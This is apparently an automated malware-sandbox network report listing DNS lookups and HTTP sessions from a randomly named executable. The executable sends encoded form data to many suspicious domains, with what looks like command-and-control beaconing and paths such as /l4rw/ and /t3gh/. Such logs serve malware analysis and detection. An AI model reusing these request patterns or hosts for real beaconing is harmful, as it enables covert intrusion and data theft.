                      Aug 23, 2024 08:26:22.936567068 CEST | 192.168.2.6 | 1.1.1.1 | 0x9fb4 | Standard query (0) | www.fontanerourgente.net | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:26:36.621120930 CEST | 192.168.2.6 | 1.1.1.1 | 0xf60b | Standard query (0) | www.onlytradez.club | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:26:49.762443066 CEST | 192.168.2.6 | 1.1.1.1 | 0x27df | Standard query (0) | www.32wxd.top | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:03.753164053 CEST | 192.168.2.6 | 1.1.1.1 | 0xc538 | Standard query (0) | www.jaxo.xyz | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:17.278268099 CEST | 192.168.2.6 | 1.1.1.1 | 0x526a | Standard query (0) | www.xforum.tech | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:31.027570963 CEST | 192.168.2.6 | 1.1.1.1 | 0xa871 | Standard query (0) | www.cannulafactory.top | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:45.167628050 CEST | 192.168.2.6 | 1.1.1.1 | 0x5e40 | Standard query (0) | www.taapbit.online | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:53.231097937 CEST | 192.168.2.6 | 1.1.1.1 | 0x561e | Standard query (0) | www.ayypromo.shop | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:06.701051950 CEST | 192.168.2.6 | 1.1.1.1 | 0x1472 | Standard query (0) | www.anaidittrich.com | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:20.090229034 CEST | 192.168.2.6 | 1.1.1.1 | 0x928a | Standard query (0) | www.551108k5.shop | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:33.964751959 CEST | 192.168.2.6 | 1.1.1.1 | 0x7a17 | Standard query (0) | www.datensicherung.email | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:47.310401917 CEST | 192.168.2.6 | 1.1.1.1 | 0x708 | Standard query (0) | www.jiyitf.top | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:29:02.276643038 CEST | 192.168.2.6 | 1.1.1.1 | 0x4bf3 | Standard query (0) | www.tadalaturbo.online | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Aug 23, 2024 08:25:53.347820044 CEST | 1.1.1.1 | 192.168.2.6 | 0x8d21 | No error (0) | www.weep.site | weep.site | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 23, 2024 08:25:53.347820044 CEST | 1.1.1.1 | 192.168.2.6 | 0x8d21 | No error (0) | weep.site | | 194.233.65.154 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:26:09.411468029 CEST | 1.1.1.1 | 192.168.2.6 | 0xd2f7 | No error (0) | www.88nn.pro | | 45.157.69.194 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:26:22.987282991 CEST | 1.1.1.1 | 192.168.2.6 | 0x9fb4 | No error (0) | www.fontanerourgente.net | fontanerourgente.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 23, 2024 08:26:22.987282991 CEST | 1.1.1.1 | 192.168.2.6 | 0x9fb4 | No error (0) | fontanerourgente.net | | 37.187.158.211 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:26:36.633464098 CEST | 1.1.1.1 | 192.168.2.6 | 0xf60b | No error (0) | www.onlytradez.club | | 167.172.133.32 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:26:50.199295998 CEST | 1.1.1.1 | 192.168.2.6 | 0x27df | No error (0) | www.32wxd.top | 32wxd.top | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 23, 2024 08:26:50.199295998 CEST | 1.1.1.1 | 192.168.2.6 | 0x27df | No error (0) | 32wxd.top | | 206.119.82.116 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:03.799355030 CEST | 1.1.1.1 | 192.168.2.6 | 0xc538 | No error (0) | www.jaxo.xyz | | 66.29.149.180 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:17.738147020 CEST | 1.1.1.1 | 192.168.2.6 | 0x526a | No error (0) | www.xforum.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:31.716407061 CEST | 1.1.1.1 | 192.168.2.6 | 0xa871 | No error (0) | www.cannulafactory.top | | 18.183.3.45 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:45.176336050 CEST | 1.1.1.1 | 192.168.2.6 | 0x5e40 | Name error (3) | www.taapbit.online | none | none | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:27:53.328103065 CEST | 1.1.1.1 | 192.168.2.6 | 0x561e | No error (0) | www.ayypromo.shop | | 176.57.64.102 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:06.722100019 CEST | 1.1.1.1 | 192.168.2.6 | 0x1472 | No error (0) | www.anaidittrich.com | | 162.55.254.209 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:20.568566084 CEST | 1.1.1.1 | 192.168.2.6 | 0x928a | No error (0) | www.551108k5.shop | gangli.ssywan.com | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 23, 2024 08:28:20.568566084 CEST | 1.1.1.1 | 192.168.2.6 | 0x928a | No error (0) | gangli.ssywan.com | | 64.64.237.133 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:33.994362116 CEST | 1.1.1.1 | 192.168.2.6 | 0x7a17 | No error (0) | www.datensicherung.email | | 85.13.151.9 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:47.988341093 CEST | 1.1.1.1 | 192.168.2.6 | 0x708 | No error (0) | www.jiyitf.top | | 172.67.215.136 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:28:47.988341093 CEST | 1.1.1.1 | 192.168.2.6 | 0x708 | No error (0) | www.jiyitf.top | | 104.21.35.73 | A (IP address) | IN (0x0001) | false
                      Aug 23, 2024 08:29:02.293705940 CEST | 1.1.1.1 | 192.168.2.6 | 0x4bf3 | No error (0) | www.tadalaturbo.online | tadalaturbo.online | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 23, 2024 08:29:02.293705940 CEST | 1.1.1.1 | 192.168.2.6 | 0x4bf3 | No error (0) | tadalaturbo.online | | 192.185.211.122 | A (IP address) | IN (0x0001) | false
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.6 | 49718 | 194.233.65.154 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:25:53.372277021 CEST | 500 | OUT | GET /v1m8/?Xn70_=MbosJJuAq5eUJ0hPiGjwIN1TLoIAcga9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjssfFBuX2F/io1ZFH4zFtNPAFxgqhGgKh1aBi0mxPguqsni1l53c=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.weep.site
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:25:54.333453894 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:25:54 GMT
                      Server: Apache
                      Accept-Ranges: bytes
                      Cache-Control: no-cache, no-store, must-revalidate
                      Pragma: no-cache
                      Expires: 0
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html
                      Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.6 | 49721 | 45.157.69.194 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:09.429574966 CEST | 742 | OUT | POST /l4rw/ HTTP/1.1
                      Host: www.88nn.pro
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.88nn.pro
                      Referer: http://www.88nn.pro/l4rw/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkiGhJSNrS6kImz0veHV06/FkQ5b27sf4fAbBm4qSLG5M
                      Aug 23, 2024 08:26:10.267561913 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:10 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "667cd175-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.6 | 49722 | 45.157.69.194 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:11.979708910 CEST | 766 | OUT | POST /l4rw/ HTTP/1.1
                      Host: www.88nn.pro
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.88nn.pro
                      Referer: http://www.88nn.pro/l4rw/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovlmQ7DE7MfSdAjB0vm1EycvJLaICv1nksVZbG1GlGl+BA==
                      Aug 23, 2024 08:26:12.814779997 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:12 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "667cd175-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.6 | 49723 | 45.157.69.194 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:14.526680946 CEST | 1779 | OUT | POST /l4rw/ HTTP/1.1
                      Host: www.88nn.pro
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.88nn.pro
                      Referer: http://www.88nn.pro/l4rw/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:15.381623983 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:15 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "667cd175-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.6 | 49724 | 45.157.69.194 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:17.077794075 CEST | 499 | OUT | GET /l4rw/?Xn70_=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.88nn.pro
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:17.917974949 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:17 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "667cd175-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.6 | 49725 | 37.187.158.211 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:23.010622978 CEST | 778 | OUT | POST /t3gh/ HTTP/1.1
                      Host: www.fontanerourgente.net
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.fontanerourgente.net
                      Referer: http://www.fontanerourgente.net/t3gh/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlu0Kk8DH07/NcG9wqkh4RBpeyb9dy5nMAtP9EMQI+o+SA
                      Aug 23, 2024 08:26:23.852689028 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:26:23 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8


                      Session ID: 6
                      Source IP: 192.168.2.6
                      Source Port: 49726
                      Destination IP: 37.187.158.211
                      Destination Port: 80
                      PID: 6008
                      Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:25.558609962 CEST | 802 | OUT | POST /t3gh/ HTTP/1.1
                      Host: www.fontanerourgente.net
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.fontanerourgente.net
                      Referer: http://www.fontanerourgente.net/t3gh/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxBTMRUPbTEJeLri3itxXy0ssK/ul/31CUe2bLRKRJporCV1ySDq74nftmZ/pblxyJjrvarFYL2cWa4IlKqWHTPRJsX0RJX5BZlyl5PB5nOFN9kY7dpckGzdr0fl8lLsv8BdOrxw4S4yT5+wb/FA5HMqvPFEeHEZnK3jxbLE7aKWS7dhf/KsVCE1TQ==
                      Aug 23, 2024 08:26:26.440879107 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:26:26 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8


                      Session ID: 7
                      Source IP: 192.168.2.6
                      Source Port: 49727
                      Destination IP: 37.187.158.211
                      Destination Port: 80
                      PID: 6008
                      Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:28.111567020 CEST | 1815 | OUT | POST /t3gh/ HTTP/1.1
                      Host: www.fontanerourgente.net
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.fontanerourgente.net
                      Referer: http://www.fontanerourgente.net/t3gh/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_= [TRUNCATED]
                      Aug 23, 2024 08:26:28.965934038 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:26:28 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8


                      Session ID: 8
                      Source IP: 192.168.2.6
                      Source Port: 49728
                      Destination IP: 37.187.158.211
                      Destination Port: 80
                      PID: 6008
                      Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:30.648657084 CEST | 511 | OUT | GET /t3gh/?Xn70_=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.fontanerourgente.net
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:31.507069111 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:26:31 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                      Aug 23, 2024 08:26:31.507110119 CEST | 1236 | IN | Data Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                      Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                      Aug 23, 2024 08:26:31.507122040 CEST | 1236 | IN | Data Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                      Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                      Aug 23, 2024 08:26:31.507230997 CEST | 1236 | IN | Data Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                      Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                      Aug 23, 2024 08:26:31.507250071 CEST | 1236 | IN | Data Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                      Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                      Aug 23, 2024 08:26:31.507261038 CEST | 1236 | IN | Data Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                      Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                      Aug 23, 2024 08:26:31.507383108 CEST | 1236 | IN | Data Raw: 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62
                      Data Ascii: nline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file
